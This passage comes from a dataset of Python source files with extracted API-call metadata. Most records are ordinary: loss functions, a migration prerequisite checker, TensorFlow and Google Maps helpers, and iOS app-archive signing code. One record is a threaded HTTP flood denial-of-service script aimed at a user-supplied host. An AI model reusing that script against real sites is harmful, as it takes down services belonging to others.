pixels, the gradients should be 0\n return logits.sum() * 0.\n signs = 2. * labels.float() - 1.\n errors = (1. - logits * Variable(signs))\n errors_sorted, perm = torch.sort(errors, dim=0, descending=True)\n perm = perm.data\n gt_sorted = labels[perm]\n grad = lovasz_grad(gt_sorted)\n loss = torch.dot(F.relu(errors_sorted), Variable(grad))\n return loss\n\ndef lovasz_loss(x, target):\n eps = 1e-6\n n_inst = x.size(0)\n x = x.reshape(n_inst, -1)\n target = target.reshape(n_inst, -1)\n\n x = torch.clamp(x, min=eps, max=1-eps)\n x = torch.log(x) - torch.log(1 - x)\n\n losses = []\n for i in range(n_inst):\n losses.append(lovasz_hinge(x[i], target[i]))\n loss = torch.stack(losses)\n\n return loss\n\ndef build_mask_pred(cfg):\n return MaskPred(cfg)\n\n\nclass MaskPred(nn.Module):\n def __init__(self, cfg):\n super(MaskPred, self).__init__()\n self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS\n self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE\n\n soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST\n self.register_buffer(\"sizes_of_interest\", torch.tensor(soi + [soi[-1] * 2]))\n\n self.register_buffer(\"_iter\", torch.zeros([1]))\n\n self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE\n self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA\n\n def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):\n if self.training:\n self._iter += 1\n\n gt_inds = pred_instances.gt_inds\n gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])\n gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)\n\n losses = {}\n\n if len(pred_instances) == 0:\n dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0\n losses[\"loss_mask\"] = dummy_loss\n else:\n mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)\n\n if self.mask_loss_type == \"Dice\":\n mask_losses = dice_coefficient(mask_prob, gt_bitmasks)\n loss_mask = mask_losses.mean()\n elif self.mask_loss_type == \"Lovasz\":\n mask_losses = lovasz_loss(mask_prob, gt_bitmasks)\n loss_mask = mask_losses.mean()\n losses[\"loss_mask\"] = loss_mask * self.mask_loss_alpha\n\n return losses\n else:\n if len(pred_instances) > 0:\n mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)\n pred_instances.pred_global_masks = mask_prob\n\n return pred_instances\n\n def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):\n proposal_embed = instances.proposal_embed\n proposal_margin = instances.proposal_margin\n im_inds = instances.im_inds\n\n dim, m_h, m_w = pixel_embed.shape[-3:]\n obj_num = proposal_embed.shape[0]\n pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]\n\n proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)\n proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)\n mask_var = (pixel_embed - proposal_embed) ** 2\n mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))\n\n assert mask_feat_stride >= self.mask_out_stride\n assert mask_feat_stride % self.mask_out_stride == 0\n mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))\n\n return mask_prob\n"},"apis":{"kind":"list like","value":["torch.sort","torch.log","torch.stack","torch.tensor","torch.cat","torch.sum","torch.nn.functional.relu","torch.autograd.Variable","torch.zeros","torch.clamp"],"string":"[\n \"torch.sort\",\n \"torch.log\",\n \"torch.stack\",\n \"torch.tensor\",\n \"torch.cat\",\n \"torch.sum\",\n \"torch.nn.functional.relu\",\n \"torch.autograd.Variable\",\n \"torch.zeros\",\n \"torch.clamp\"\n]"},"extract_api":{"kind":"string","value":"[((1370, 1412), 'torch.sort', 'torch.sort', (['errors'], {'dim': '(0)', 'descending': '(True)'}), '(errors, dim=0, descending=True)\\n', (1380, 1412), False, 'import torch\\n'), ((1719, 1755), 'torch.clamp', 'torch.clamp', (['x'], {'min': 'eps', 'max': '(1 - eps)'}), '(x, min=eps, max=1 - eps)\\n', (1730, 1755), False, 'import torch\\n'), ((1903, 1922), 'torch.stack', 'torch.stack', (['losses'], {}), '(losses)\\n', (1914, 1922), False, 'import torch\\n'), ((1518, 1539), 'torch.nn.functional.relu', 'F.relu', (['errors_sorted'], {}), '(errors_sorted)\\n', (1524, 1539), True, 'from torch.nn import functional as F\\n'), ((1541, 1555), 'torch.autograd.Variable', 'Variable', (['grad'], {}), '(grad)\\n', (1549, 1555), False, 'from torch.autograd import Variable\\n'), ((1762, 1774), 'torch.log', 'torch.log', (['x'], {}), '(x)\\n', (1771, 1774), False, 'import torch\\n'), ((1777, 1793), 'torch.log', 'torch.log', (['(1 - x)'], {}), '(1 - x)\\n', (1786, 1793), False, 'import torch\\n'), ((1327, 1342), 'torch.autograd.Variable', 'Variable', (['signs'], {}), '(signs)\\n', (1335, 1342), False, 'from torch.autograd import Variable\\n'), ((2328, 2361), 'torch.tensor', 'torch.tensor', (['(soi + [soi[-1] * 2])'], {}), '(soi + [soi[-1] * 2])\\n', (2340, 2361), False, 'import torch\\n'), ((2402, 2418), 'torch.zeros', 'torch.zeros', (['[1]'], {}), '([1])\\n', (2413, 2418), False, 'import torch\\n'), ((2770, 2828), 'torch.cat', 'torch.cat', (['[per_im.gt_bitmasks for per_im in gt_instances]'], {}), '([per_im.gt_bitmasks for per_im in gt_instances])\\n', (2779, 2828), False, 'import torch\\n'), ((4622, 4666), 'torch.sum', 'torch.sum', (['(mask_var * proposal_margin)'], {'dim': '(3)'}), '(mask_var * proposal_margin, dim=3)\\n', (4631, 4666), False, 'import torch\\n')]"}}},{"rowIdx":720,"cells":{"code":{"kind":"string","value":"# Copyright 2016 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport getpass\nimport logging\n\nfrom cloudferry.lib.base import exception\nfrom cloudferry.lib.base.action import action\nfrom cloudferry.lib.utils import local\nfrom cloudferry.lib.utils import remote_runner\n\nLOG = logging.getLogger(__name__)\n\n\nclass CheckVMAXPrerequisites(action.Action):\n \"\"\"This verifies prerequisites required for NFS to VMAX iSCSI cinder\n volume migration\"\"\"\n\n def _iscsiadm_is_installed_locally(self):\n LOG.info(\"Checking if iscsiadm tool is installed\")\n try:\n local.run('iscsiadm --help &>/dev/null')\n except local.LocalExecutionFailed:\n msg = (\"iscsiadm is not available on the local host. Please \"\n \"install iscsiadm tool on the node you running on or \"\n \"choose other cinder backend for migration. iscsiadm is \"\n \"mandatory for migrations with EMC VMAX cinder backend\")\n LOG.error(msg)\n raise exception.AbortMigrationError(msg)\n\n def _check_local_sudo_password_set(self):\n current_user = getpass.getuser()\n if current_user != 'root' and \\\n self.cfg.migrate.local_sudo_password is None:\n try:\n local.sudo('ls')\n except local.LocalExecutionFailed:\n msg = (\"CloudFerry is running as '{user}' user, but \"\n \"passwordless sudo does not seem to be configured on \"\n \"current host. Please either specify password in \"\n \"`local_sudo_password` config option, or run \"\n \"CloudFerry as root user.\").format(user=current_user)\n LOG.error(msg)\n raise exception.AbortMigrationError(msg)\n\n def _ssh_connectivity_between_controllers(self):\n src_host = self.cfg.src.ssh_host\n src_user = self.cfg.src.ssh_user\n dst_host = self.cfg.dst.ssh_host\n dst_user = self.cfg.dst.ssh_user\n\n LOG.info(\"Checking ssh connectivity between '%s' and '%s'\",\n src_host, dst_host)\n\n rr = remote_runner.RemoteRunner(src_host, src_user)\n\n ssh_opts = ('-o UserKnownHostsFile=/dev/null '\n '-o StrictHostKeyChecking=no')\n\n cmd = \"ssh {opts} {user}@{host} 'echo ok'\".format(opts=ssh_opts,\n user=dst_user,\n host=dst_host)\n\n try:\n rr.run(cmd)\n except remote_runner.RemoteExecutionError:\n msg = (\"No ssh connectivity between source host '{src_host}' and \"\n \"destination host '{dst_host}'. Make sure you have keys \"\n \"and correct configuration on these nodes. To verify run \"\n \"'{ssh_cmd}' from '{src_host}' node\")\n msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)\n LOG.error(msg)\n raise exception.AbortMigrationError(msg)\n\n def run(self, **kwargs):\n if self.cfg.dst_storage.backend != 'iscsi-vmax':\n return\n self._iscsiadm_is_installed_locally()\n self._ssh_connectivity_between_controllers()\n self._check_local_sudo_password_set()\n"},"apis":{"kind":"list like","value":["logging.getLogger","cloudferry.lib.utils.remote_runner.RemoteRunner","cloudferry.lib.utils.local.sudo","cloudferry.lib.base.exception.AbortMigrationError","cloudferry.lib.utils.local.run","getpass.getuser"],"string":"[\n \"logging.getLogger\",\n \"cloudferry.lib.utils.remote_runner.RemoteRunner\",\n \"cloudferry.lib.utils.local.sudo\",\n \"cloudferry.lib.base.exception.AbortMigrationError\",\n \"cloudferry.lib.utils.local.run\",\n \"getpass.getuser\"\n]"},"extract_api":{"kind":"string","value":"[((789, 816), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\\n', (806, 816), False, 'import logging\\n'), ((1627, 1644), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\\n', (1642, 1644), False, 'import getpass\\n'), ((2639, 2685), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', (['src_host', 'src_user'], {}), '(src_host, src_user)\\n', (2665, 2685), False, 'from cloudferry.lib.utils import remote_runner\\n'), ((1092, 1132), 'cloudferry.lib.utils.local.run', 'local.run', (['\"\"\"iscsiadm --help &>/dev/null\"\"\"'], {}), \"('iscsiadm --help &>/dev/null')\\n\", (1101, 1132), False, 'from cloudferry.lib.utils import local\\n'), ((1522, 1556), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\\n', (1551, 1556), False, 'from cloudferry.lib.base import exception\\n'), ((1780, 1796), 'cloudferry.lib.utils.local.sudo', 'local.sudo', (['\"\"\"ls\"\"\"'], {}), \"('ls')\\n\", (1790, 1796), False, 'from cloudferry.lib.utils import local\\n'), ((3518, 3552), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\\n', (3547, 3552), False, 'from cloudferry.lib.base import exception\\n'), ((2266, 2300), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', (['msg'], {}), '(msg)\\n', (2295, 2300), False, 'from cloudferry.lib.base import exception\\n')]"}}},{"rowIdx":721,"cells":{"code":{"kind":"string","value":"import random\nimport socket\nimport string\nimport sys\nimport threading\nimport time\n\n\ndef attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:\n # Threading support\n thread_num = 0\n thread_num_mutex = threading.Lock()\n\n # Utility function\n def print_status() -> None:\n global thread_num\n thread_num_mutex.acquire(True)\n\n thread_num += 1\n print(f\"\\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...\")\n\n thread_num_mutex.release()\n\n def generate_url_path():\n msg = str(string.ascii_letters + string.digits + string.punctuation)\n data = \"\".join(random.sample(msg, 5))\n return data\n\n def attack_() -> None:\n print_status()\n url_path = generate_url_path()\n\n dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n dos.connect((ip, port))\n\n msg = f\"GET /{url_path} HTTP/1.1\\nHost: {host}\\n\\n\"\n dos.send(msg.encode())\n except socket.error:\n print(f\"[ERROR] Site may be down | {socket.error}\")\n finally:\n dos.shutdown(socket.SHUT_RDWR)\n dos.close()\n\n try:\n host = host.replace(\"https://\", \"\").replace(\"http://\", \"\").replace(\"www.\", \"\")\n ip = socket.gethostbyname(host)\n except socket.gaierror:\n print(\"[ERROR] Make sure you entered a correct website!\")\n sys.exit(2)\n\n all_threads = []\n\n for i in range(request_count):\n t1 = threading.Thread(target=attack)\n t1.start()\n all_threads.append(t1)\n\n time.sleep(0.01)\n\n for current_thread in all_threads:\n current_thread.join()\n"},"apis":{"kind":"list like","value":["socket.gethostbyname","random.sample","time.ctime","socket.socket","threading.Lock","time.sleep","sys.exit","threading.Thread"],"string":"[\n \"socket.gethostbyname\",\n \"random.sample\",\n \"time.ctime\",\n \"socket.socket\",\n \"threading.Lock\",\n \"time.sleep\",\n \"sys.exit\",\n \"threading.Thread\"\n]"},"extract_api":{"kind":"string","value":"[((228, 244), 'threading.Lock', 'threading.Lock', ([], {}), '()\\n', (242, 244), False, 'import threading\\n'), ((794, 843), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\\n', (807, 843), False, 'import socket\\n'), ((1281, 1307), 'socket.gethostbyname', 'socket.gethostbyname', (['host'], {}), '(host)\\n', (1301, 1307), False, 'import socket\\n'), ((1493, 1524), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\\n', (1509, 1524), False, 'import threading\\n'), ((1584, 1600), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\\n', (1594, 1600), False, 'import time\\n'), ((646, 667), 'random.sample', 'random.sample', (['msg', '(5)'], {}), '(msg, 5)\\n', (659, 667), False, 'import random\\n'), ((1410, 1421), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\\n', (1418, 1421), False, 'import sys\\n'), ((411, 423), 'time.ctime', 'time.ctime', ([], {}), '()\\n', (421, 423), False, 'import time\\n')]"}}},{"rowIdx":722,"cells":{"code":{"kind":"string","value":"import random\nclass Yolov3(object):\n\n\tdef __init__(self):\n\t\tself.num=0\n\t\tself.input_size=[8,16,32]\n\tdef __iter__(self):\n\t\treturn self\n\tdef __next__(self):\n\t\ta = random.choice(self.input_size)\n\t\tself.num=self.num+1\n\t\tif self.num<3:\n\t\t\treturn a\n\t\telse:\n\t\t\traise StopIteration\nyolo=Yolov3()\nfor data in yolo:\n\tprint(data)\n"},"apis":{"kind":"list like","value":["random.choice"],"string":"[\n \"random.choice\"\n]"},"extract_api":{"kind":"string","value":"[((161, 191), 'random.choice', 'random.choice', (['self.input_size'], {}), '(self.input_size)\\n', (174, 191), False, 'import random\\n')]"}}},{"rowIdx":723,"cells":{"code":{"kind":"string","value":"import googlemaps\n\ngmaps = googlemaps.Client(key='google_key')\n\n\ndef get_markers(address):\n geocode_result = gmaps.geocode(address)\n return geocode_result[0]['geometry']['location']\n"},"apis":{"kind":"list like","value":["googlemaps.Client"],"string":"[\n \"googlemaps.Client\"\n]"},"extract_api":{"kind":"string","value":"[((27, 62), 'googlemaps.Client', 'googlemaps.Client', ([], {'key': '\"\"\"google_key\"\"\"'}), \"(key='google_key')\\n\", (44, 62), False, 'import googlemaps\\n')]"}}},{"rowIdx":724,"cells":{"code":{"kind":"string","value":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Imports\nimport os\nimport numpy as np\nimport tensorflow as tf\n\n\ndef run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):\n \"\"\"\n Run the estimator\n \"\"\"\n if optimizer is None:\n optimizer = tf.keras.estimators.SGD(\n lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)\n\n # 1. Compile the model\n model.compile(\n optimizer=optimizer, loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n # 2. Create an estimator\n model_est = tf.keras.estimator.model_to_estimator(\n keras_model=model, model_dir='./lenet')\n\n # Training\n # 3a. Create the training function\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={model.input_names[0]: X['train'].astype(np.float32)},\n y=Y['train'].astype(np.float32),\n batch_size=nb_batches,\n num_epochs=nb_epochs,\n shuffle=True\n )\n\n # 3b. Train the model\n model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)\n\n # Evaluate\n # 4a. Evaluate the model\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={model.input_names[0]: X['test'].astype(np.float32)},\n y=Y['test'].astype(np.float32),\n batch_size=nb_batches,\n num_epochs=nb_epochs,\n shuffle=True\n )\n\n # 4b. Evaluate the model\n model_eval = model_est.evaluate(input_fn=eval_input_fn)\n print(model_eval)\n\n return model_est, model_eval\n\n\ndef run_from_generator(\n model, input_func=None, input_func_dict=None,\n eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):\n \"\"\"\n Overloaded function to create an estimator using tf.data.Dataset\n :param model : uncompiled keras model\n :param input_fn : input function providing tf.data.Dataset to the estimator\n :param input_fn_dict : dictionary containing input params for input_fn\n :param eval_fn_dict : dictionary containing params for eval input_fn\n :param model_dir : directory to store the trained model\n \"\"\"\n\n # 1. Create optimizer and compile model if optimizer is None\n if (optimizer is None):\n optimizer = tf.keras.optimizers.SGD(\n lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)\n\n # 2. compile the model\n model.compile(\n optimizer=optimizer, loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n # 3. create estimator\n dir_path = os.path.join(os.getcwd(), model_dir)\n print(\"Model path chosen : \", dir_path)\n if (not os.path.exists(dir_path)):\n os.mkdir(dir_path)\n\n print(\"Creating estimator...\")\n est = tf.keras.estimator.model_to_estimator(\n keras_model=model, model_dir=dir_path)\n\n # 4. Train and Evaluate the model\n print(\"Training...\")\n\n # training spec\n train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),\n max_steps=500)\n\n # evaluation spec\n eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))\n\n # Run the training\n model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)\n #est.train(input_fn=lambda: input_func(input_func_dict),\n # steps=None)\n #\n #est.evalute(input_fn=lambda: input_func(eval_func_dict))\n\n return est\n"},"apis":{"kind":"list like","value":["os.path.exists","tensorflow.keras.estimator.model_to_estimator","tensorflow.estimator.train_and_evaluate","tensorflow.keras.optimizers.SGD","os.getcwd","os.mkdir","tensorflow.keras.estimators.SGD"],"string":"[\n \"os.path.exists\",\n \"tensorflow.keras.estimator.model_to_estimator\",\n \"tensorflow.estimator.train_and_evaluate\",\n \"tensorflow.keras.optimizers.SGD\",\n \"os.getcwd\",\n \"os.mkdir\",\n \"tensorflow.keras.estimators.SGD\"\n]"},"extract_api":{"kind":"string","value":"[((613, 690), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': '\"\"\"./lenet\"\"\"'}), \"(keras_model=model, model_dir='./lenet')\\n\", (650, 690), True, 'import tensorflow as tf\\n'), ((2763, 2839), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': 'dir_path'}), '(keras_model=model, model_dir=dir_path)\\n', (2800, 2839), True, 'import tensorflow as tf\\n'), ((3197, 3256), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', (['est', 'train_spec', 'eval_spec'], {}), '(est, train_spec, eval_spec)\\n', (3228, 3256), True, 'import tensorflow as tf\\n'), ((327, 403), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', ([], {'lr': '(0.0009)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.0009, decay=1e-05, momentum=0.9, nesterov=True)\\n', (350, 403), True, 'import tensorflow as tf\\n'), ((2290, 2365), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', ([], {'lr': '(0.001)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.001, decay=1e-05, momentum=0.9, nesterov=True)\\n', (2313, 2365), True, 'import tensorflow as tf\\n'), ((2583, 2594), 'os.getcwd', 'os.getcwd', ([], {}), '()\\n', (2592, 2594), False, 'import os\\n'), ((2663, 2687), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\\n', (2677, 2687), False, 'import os\\n'), ((2698, 2716), 'os.mkdir', 'os.mkdir', (['dir_path'], {}), '(dir_path)\\n', (2706, 2716), False, 'import os\\n')]"}}},{"rowIdx":725,"cells":{"code":{"kind":"string","value":"\"\"\" Represents an app archive. This is an app at rest, whether it's a naked\n app bundle in a directory, or a zipped app bundle, or an IPA. We have a\n common interface to extract these apps to a temp file, then resign them,\n and create an archive of the same type \"\"\"\n\nimport abc\nimport biplist\nfrom bundle import App, Bundle, is_info_plist_native\nfrom exceptions import MissingHelpers, NotSignable, NotMatched\nfrom distutils import spawn\nimport logging\nimport os\nfrom os.path import abspath, dirname, exists, isdir, isfile, join, normpath\nimport tempfile\nimport re\nfrom subprocess import call\nfrom signer import Signer\nimport shutil\nimport zipfile\n\n\nREMOVE_WATCHKIT = True\nhelper_paths = {}\nlog = logging.getLogger(__name__)\n\n\ndef get_helper(helper_name):\n \"\"\" find paths to executables. Cached in helper_paths \"\"\"\n if helper_name not in helper_paths or helper_paths[helper_name] is None:\n # note, find_executable returns None is not found\n # in other words, we keep retrying until found\n helper_paths[helper_name] = spawn.find_executable(helper_name)\n log.debug(\"got executable {} for {}\".format(helper_paths[helper_name],\n helper_name))\n return helper_paths[helper_name]\n\n\ndef make_temp_dir():\n return tempfile.mkdtemp(prefix=\"isign-\")\n\n\ndef get_watchkit_paths(root_bundle_path):\n \"\"\" collect sub-bundles of this bundle that have watchkit \"\"\"\n # typical structure:\n #\n # app_bundle\n # ...\n # some_directory\n # watchkit_extension <-- this is the watchkit bundle\n # Info.plist\n # watchkit_bundle <-- this is the part that runs on the Watch\n # Info.plist <-- WKWatchKitApp=True\n #\n watchkit_paths = []\n for path, _, _ in os.walk(root_bundle_path):\n if path == root_bundle_path:\n continue\n try:\n bundle = Bundle(path)\n except NotMatched:\n # this directory is not a bundle\n continue\n if bundle.info.get('WKWatchKitApp') is True:\n # get the *containing* bundle\n watchkit_paths.append(dirname(path))\n return watchkit_paths\n\n\ndef process_watchkit(root_bundle_path, should_remove=False):\n \"\"\" Unfortunately, we currently can't sign WatchKit. If you don't\n care about watchkit functionality, it is\n generally harmless to remove it, so that's the default.\n Remove when https://github.com/saucelabs/isign/issues/20 is fixed \"\"\"\n watchkit_paths = get_watchkit_paths(root_bundle_path)\n if len(watchkit_paths) > 0:\n if should_remove:\n for path in watchkit_paths:\n log.warning(\"Removing WatchKit bundle {}\".format(path))\n shutil.rmtree(path)\n else:\n raise NotSignable(\"Cannot yet sign WatchKit bundles\")\n\n\nclass Archive(object):\n __metaclass__ = abc.ABCMeta\n # we use abc.abstractmethod throughout because there are certain class\n # methods we want to ensure are implemented.\n\n @abc.abstractmethod\n def unarchive_to_temp(self):\n \"\"\" Unarchive and copy to a temp directory \"\"\"\n pass\n\n @abc.abstractmethod\n def archive(cls, path, output_path):\n \"\"\" Archive a directory to an output path \"\"\"\n pass\n\n @abc.abstractmethod\n def get_info(cls, path):\n \"\"\" Obtain app metadata from Info.plist without unarchiving \"\"\"\n pass\n\n @abc.abstractmethod\n def precheck(cls, path):\n \"\"\" Check if this is, in fact, an archive of this type \"\"\"\n pass\n\n @abc.abstractmethod\n def find_bundle_dir(cls, path):\n \"\"\" Locate the directory of the main app (aka bundle) \"\"\"\n pass\n\n\nclass AppArchive(Archive):\n \"\"\" The simplest form of archive -- a naked App Bundle, with no extra directory structure,\n compression, etc \"\"\"\n\n @classmethod\n def find_bundle_dir(cls, path):\n \"\"\" Included for similarity with the zipped archive classes. In this case, the bundle dir\n *is* the directory \"\"\"\n return path\n\n @classmethod\n def _get_plist_path(cls, path):\n return join(cls.find_bundle_dir(path), \"Info.plist\")\n\n @classmethod\n def get_info(cls, path):\n return biplist.readPlist(cls._get_plist_path(path))\n\n @classmethod\n def precheck(cls, path):\n if not isdir(path):\n return False\n if not os.path.exists(cls._get_plist_path(path)):\n return False\n plist = cls.get_info(path)\n is_native = is_info_plist_native(plist)\n log.debug(\"is_native: {}\".format(is_native))\n return is_native\n\n @classmethod\n def archive(cls, path, output_path):\n if exists(output_path):\n shutil.rmtree(output_path)\n shutil.move(path, output_path)\n log.info(\"archived %s to %s\" % (cls.__name__, output_path))\n\n def __init__(self, path):\n self.path = path\n self.relative_bundle_dir = '.'\n self.bundle_info = self.get_info(self.path)\n\n def unarchive_to_temp(self):\n containing_dir = make_temp_dir()\n log.debug(\"unarchiving to temp... %s -> %s\", self.path, containing_dir)\n shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already\n shutil.copytree(self.path, containing_dir)\n process_watchkit(containing_dir, REMOVE_WATCHKIT)\n return UncompressedArchive(containing_dir, '.', self.__class__)\n\n\nclass AppZipArchive(Archive):\n \"\"\" Just like an app, except it's zipped up, and when repackaged,\n should be re-zipped. \"\"\"\n app_dir_pattern = r'^([^/]+\\.app/).*$'\n extensions = ['.zip']\n helpers = ['zip', 'unzip']\n\n @classmethod\n def is_helpers_present(cls):\n \"\"\" returns False if any of our helper apps wasn't found in class init \"\"\"\n is_present = True\n for helper_name in cls.helpers:\n if get_helper(helper_name) is None:\n log.error(\"missing helper for class {}: {}\".format(cls.__name__, helper_name))\n is_present = False\n break\n return is_present\n\n @classmethod\n def is_archive_extension_match(cls, path):\n \"\"\" does this path have the right extension \"\"\"\n log.debug('extension match')\n for extension in cls.extensions:\n log.debug('extension match: %s', extension)\n if path.endswith(extension):\n return True\n return False\n\n @classmethod\n def find_bundle_dir(cls, zipfile_obj):\n relative_bundle_dir = None\n apps = set()\n file_list = zipfile_obj.namelist()\n for file_name in file_list:\n matched = re.match(cls.app_dir_pattern, file_name)\n if matched:\n apps.add(matched.group(1))\n if len(apps) == 1:\n log.debug(\"found one app\")\n relative_bundle_dir = apps.pop()\n elif len(apps) > 1:\n log.warning('more than one app found in archive')\n else:\n log.warning('no apps found in archive')\n return relative_bundle_dir\n\n @classmethod\n def _get_plist_path(cls, relative_bundle_dir):\n return join(relative_bundle_dir, \"Info.plist\")\n\n @classmethod\n def precheck(cls, path):\n \"\"\" Checks if an archive looks like this kind of app. Have to examine\n within the zipfile, b/c we don't want to make temp dirs just yet. This\n recapitulates a very similar precheck in the Bundle class \"\"\"\n if not isfile(path):\n return False\n if not cls.is_helpers_present():\n raise MissingHelpers(\"helpers not present\")\n is_native = False\n log.debug('precheck')\n log.debug('path: %s', path)\n if (cls.is_archive_extension_match(path) and\n zipfile.is_zipfile(path)):\n log.debug(\"this is an archive, and a zipfile\")\n zipfile_obj = zipfile.ZipFile(path)\n relative_bundle_dir = cls.find_bundle_dir(zipfile_obj)\n if relative_bundle_dir is not None:\n plist_path = cls._get_plist_path(relative_bundle_dir)\n if plist_path not in zipfile_obj.namelist():\n return False\n plist = cls.get_info(relative_bundle_dir, zipfile_obj)\n is_native = is_info_plist_native(plist)\n log.debug(\"is_native: {}\".format(is_native))\n return is_native\n\n @classmethod\n def get_info(cls, relative_bundle_dir, zipfile_obj):\n plist_path = cls._get_plist_path(relative_bundle_dir)\n plist_bytes = zipfile_obj.read(plist_path)\n return biplist.readPlistFromString(plist_bytes)\n\n def __init__(self, path):\n self.path = path\n zipfile_obj = zipfile.ZipFile(path)\n self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj)\n self.bundle_info = self.get_info(self.relative_bundle_dir,\n zipfile_obj)\n\n def unarchive_to_temp(self):\n containing_dir = make_temp_dir()\n call([get_helper('unzip'), \"-qu\", self.path, \"-d\", containing_dir])\n app_dir = abspath(join(containing_dir, self.relative_bundle_dir))\n process_watchkit(app_dir, REMOVE_WATCHKIT)\n return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__)\n\n @classmethod\n def archive(cls, containing_dir, output_path):\n \"\"\" archive this up into a zipfile. Note this is a classmethod, because\n the caller will use us on a temp directory somewhere \"\"\"\n # the temp file is necessary because zip always adds \".zip\" if it\n # does not have an extension. But we want to respect the desired\n # output_path's extension, which could be \".ipa\" or who knows.\n # So we move it to the output_path later.\n #\n # We also do a little dance with making another temp directory just\n # to construct the zip file. This is the best way to ensure the an unused\n # filename. Also, `zip` won't overwrite existing files, so this is safer.\n temp_zip_dir = None\n try:\n # need to chdir and use relative paths, because zip is stupid\n temp_zip_dir = tempfile.mkdtemp(prefix=\"isign-zip-\")\n temp_zip_file = join(temp_zip_dir, 'temp.zip')\n call([get_helper('zip'), \"-qr\", temp_zip_file, \".\"], cwd=containing_dir)\n shutil.move(temp_zip_file, output_path)\n log.info(\"archived %s to %s\" % (cls.__name__, output_path))\n finally:\n if temp_zip_dir is not None and isdir(temp_zip_dir):\n shutil.rmtree(temp_zip_dir)\n\n\nclass IpaArchive(AppZipArchive):\n \"\"\" IPA is Apple's standard for distributing apps. Much like an AppZip,\n but slightly different paths \"\"\"\n extensions = ['.ipa']\n app_dir_pattern = r'^(Payload/[^/]+\\.app/).*$'\n\n\nclass UncompressedArchive(object):\n \"\"\" This just keeps track of some state with an unzipped app archive and\n how to re-zip it back up once re-signed. The bundle is located somewhere\n inside the containing directory, but might be a few directories down, like in\n a ContainingDir/Payload/something.app\n\n This class is also useful if you have an app that's already unzipped and\n you want to sign it. \"\"\"\n def __init__(self, path, relative_bundle_dir, archive_class):\n \"\"\" Path is the \"Containing dir\", the dir at the root level of the unzipped archive\n (or the dir itself, in the case of an AppArchive archive)\n relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app\n archive class is the kind of archive this was (Ipa, etc.) 